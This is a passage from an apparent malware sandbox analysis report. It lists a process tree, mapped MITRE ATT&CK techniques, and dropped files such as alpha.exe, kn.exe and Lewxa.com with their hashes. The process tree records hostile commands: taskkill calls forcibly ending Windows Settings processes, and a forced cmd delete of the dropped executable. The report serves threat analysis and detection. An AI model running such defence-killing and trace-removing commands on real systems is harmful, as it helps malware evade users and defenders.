    - Executes dropped EXE
    PID:2280
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    3⤵
    - Executes dropped EXE
    PID:308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM SystemSettings.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1636
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
    3⤵
    - Executes dropped EXE
    PID:840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM SystemSettingsAdminFlows.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
    3⤵
    PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Veevsruh.bat

Filesize
3.6MB

MD5
37b5e2f4baf4013e49ba80df6f482970

SHA1
5aa644fd69f1c9e13d5fe387e0704d2cb6cf4893

SHA256
0952854bc8f64245f86430953d975f260326456aaf260fd767676846e825da3a

SHA512
09fecd4808774523cfbba7d091e1c6e9b52581efcdfc9f34927613d3b348f5355cdf91a8b0f965448a09b92404ce4143a706d419b5f8c63e14b5d8a3a705d18f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
c57ff8d9db79946f11566b3b35017bce

SHA1
9378e1f2bf5841ecf435673a06f073edcca71d18

SHA256
e245609bca9316431999933b1959520050f088fbb361eea2bf8eeaa7bb715391

SHA512
2212761eadd60c6550b30cee361e51bcac3d291c136661ee087efe09479e803a3601fbb1bf34220a545d1b374557149e65b44fe98f438fcd2ce4732b69f3e47b

Download Submit
C:\Users\Public\Lewxa.txt

Filesize
2.6MB

MD5
25b05bece907e96224d7dbd1c3a64310

SHA1
ec606a8a788213c4f09be50cd74305283646ede0

SHA256
f61a3c4b636d9194eb36b2504fc4db162f5ab65c14558e82868121eabae08f6b

SHA512
b60e28c9759e6d39af8a00645784890b46df584c14bf4aeea380f438fbb7a4fca0c6e74ed3c61117f924a99bd6fdb49eceee72656a2ee920cae055a57564c77d

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
704KB

MD5
27c1730c83565a411a9062e56bc2e385

SHA1
f687fab7939f249aeeda60ebd57b7c787f6818a3

SHA256
884b55f00658bf26b27ea2060a8b0857d3d97397a2576cff36fddfeb8096ed65

SHA512
60fb224dc250f95d7575d8ca2fa7aacf9696bbaec1b602a723af30afa6309b8c0604cc68c9780ac51c7d2c5cb51864a19a8dfd9776a8ffa251075d88215127f8

Download Submit
C:\Users\Public\kn.exe

Filesize
869KB

MD5
7b973145f7e1b59330ca4dd1f86b3d55

SHA1
10ce9174bff4856083e6adad0094a798ced2c079

SHA256
589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

SHA512
1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Public\Libraries\Lewxa.com

Filesize
1.1MB

MD5
3391422b9c1e80daa52419758f672c1e

SHA1
1c731c3d758f7be1cc36c246ce1cfa0e43e6371c

SHA256
b9852de115ee3034df9f3031407eae2ccf3d170d0511207774f1862917877ade

SHA512
c81a10dfe1dbbd914b896b9e7cb25cc9234e76ce8eb374eadb35ffc9f4e901cb234fbf631250f7f20cc23545d5a01c6ff44622c67d889183692deae068af5297

Download Submit
\Users\Public\Libraries\Lewxa.com

Filesize
1.3MB

MD5
9ced267dfca0c3f0a7856e4969813cfb

SHA1
fc963847ec66ff054204eff6c2fbade6b5742831

SHA256
83fcbb145a53ef5f35ce64746e84ed386b2960ffc6c1af5943e2fb77522516c2

SHA512
bf43a88664a5996a529c4eb1915dee2343a1eb619418dd86842b146bd732d3b9eac740945af8b0ba1149b3c6f6fc65ae18affb844f3a80992745efb974ad5f7b

Download Submit
\Users\Public\alpha.exe

Filesize
295KB

MD5
ad7b9c14083b52bc532fba5948342b98

SHA1
ee8cbf12d87c4d388f09b4f69bed2e91682920b5

SHA256
17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae

SHA512
e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1

Download Submit
memory/1644-66-0x0000000003040000-0x0000000004040000-memory.dmp

Filesize
16.0MB

Download
memory/1644-61-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1644-72-0x0000000000400000-0x0000000000551000-memory.dmp

Filesize
1.3MB

Download
memory/1644-71-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1644-67-0x0000000003040000-0x0000000004040000-memory.dmp

Filesize
16.0MB

Download
memory/2740-2-0x00000000716FD000-0x0000000071708000-memory.dmp

Filesize
44KB

Download
memory/2740-0-0x000000002FCD1000-0x000000002FCD2000-memory.dmp

Filesize
4KB

Download
memory/2740-46-0x00000000716FD000-0x0000000071708000-memory.dmp

Filesize
44KB

Download
memory/2740-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2740-94-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2740-95-0x00000000716FD000-0x0000000071708000-memory.dmp

Filesize
44KB

Download
memory/3008-33-0x000000006B990000-0x000000006BF3B000-memory.dmp

Filesize
5.7MB

Download
memory/3008-45-0x000000006B990000-0x000000006BF3B000-memory.dmp

Filesize
5.7MB

Download
memory/3008-34-0x000000006B990000-0x000000006BF3B000-memory.dmp

Filesize
5.7MB

Download
memory/3008-36-0x0000000002320000-0x0000000002360000-memory.dmp

Filesize
256KB

Download
memory/3008-37-0x0000000002320000-0x0000000002360000-memory.dmp

Filesize
256KB

Download